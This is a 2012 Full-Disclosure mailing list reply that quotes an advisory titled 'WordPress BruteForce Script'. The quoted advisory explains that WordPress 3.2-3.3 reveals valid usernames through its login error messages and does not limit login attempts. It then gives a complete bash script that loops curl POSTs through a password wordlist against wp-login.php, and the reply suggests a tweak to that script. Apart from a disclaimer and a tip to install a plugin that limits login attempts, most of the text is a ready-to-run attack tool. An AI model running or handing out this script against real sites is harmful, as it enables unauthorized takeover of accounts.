Just an advice CorryL, add "--silent" in curl, to avoid annoying output
Il 29/04/2012 18:09, CorryL ha scritto: > -=[--------------------ADVISORY-------------------]=- > > WordPress BruteForce Script > > Author: Corrado Liotta Aka CorryL [[email protected]] #x0n3-h4ck will > never die# > -=[-----------------------------------------------]=- > > > -=[+] Application: WordPress > -=[+] Version: 3.2-3.3 > -=[+] Vendor's URL: Wordpres.org > -=[+] Platform: Windows\Linux\Unix > -=[+] Bug type: BruteForce > -=[+] Exploitation: Remote > -=[-] > -=[+] Author: Corrado Liotta Aka CorryL ~ corryl80[at]gmail[dot]com ~ > -=[+] Facebook: https://www.facebook.com/CorryL > -=[+] Twitter: https://twitter.com/#!/CorradoLiotta > -=[+] Linkedin: http://it.linkedin.com/pub/corrado-liotta/21/1a8/611 > -=[+] +Google: https://plus.google.com/u/0/109396477464303670923 > > ...::[ Descriprion ]::.. > > What I am about to describe is not a new thing, but I wanted to create > this simple script, > to show how easily it is possible to violate famous as a cms wordpress, > unfortunately like most of you know wordpress has some minor problems > related to the security module login, > in practice as you will see in the picture any user can discover a > user actually > exists simply trying to enter any passwords, because if the CMS > recognizes that the user is present > in the database but the password is wrong return this message "the > password for the admin user is not correct ", > so this makes us understand that the admin user exists, > and that you need only enter the correct password. Another small flaw > security of this CMS > is that it has no control on the default login attemps, > this allows a attaker do not want all the attempts that never stopped coming, > a TIP that I give to all those who use this cms is to install a plugin > for login attemps, > we find several directories inside the plugins wordpress.org > > > > > ...::[ Proof Of Concept ]::.. > > Image: http://img832.imageshack.us/img832/4481/wordpressbrute.jpg > > ...::[ Script ]::.. > > #!/bin/bash > echo "Wordpress Bruteforcing By Corrado Liotta Aka CorryL" > # Questo script è stato creato a scopo illustrativo. > # Non mi ritengo responsabile sull'uso inappropriato. > # La violazione di sistema informatico non autorizzato > # è punibile per legge Art. 615 Ter > # Installa sul tuo blog wordpress un plugin per il login attemp. > echo "Username"; read USER; > echo "Wordlist Password"; read WLIST; > echo "Sito Web"; read WEB; > > > while read line > do > echo "---> TESTING ${line} per l'utente $USER" > curl --output test.html --cookie-jar c.cookie --data > "log=$USER&pwd=${line}&wp-submit=Collegati&redirect_to=http%3A%2F%2F$WEB%2Fwp-admin%2F&testcookie=1" > "http://$WEB/wp-login.php"; > cat c.cookie>COOK > PARSE=$(cat test.html |grep "La password inserita per l'utente") > CHECK=$(cat COOK|grep "#HttpOnly") > if [ "$CHECK" != "" ]; then > echo "--> Utente $USER PASSWORD TROVATA ! --> ${line} " > break > else > echo "--> Utente $USER PASSWORD Non Trovata !" > fi > > > done< $WLIST > > > > ..::[ Disclousure Timeline ]::.. > > [29/04/2012] - Public Disclousure > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
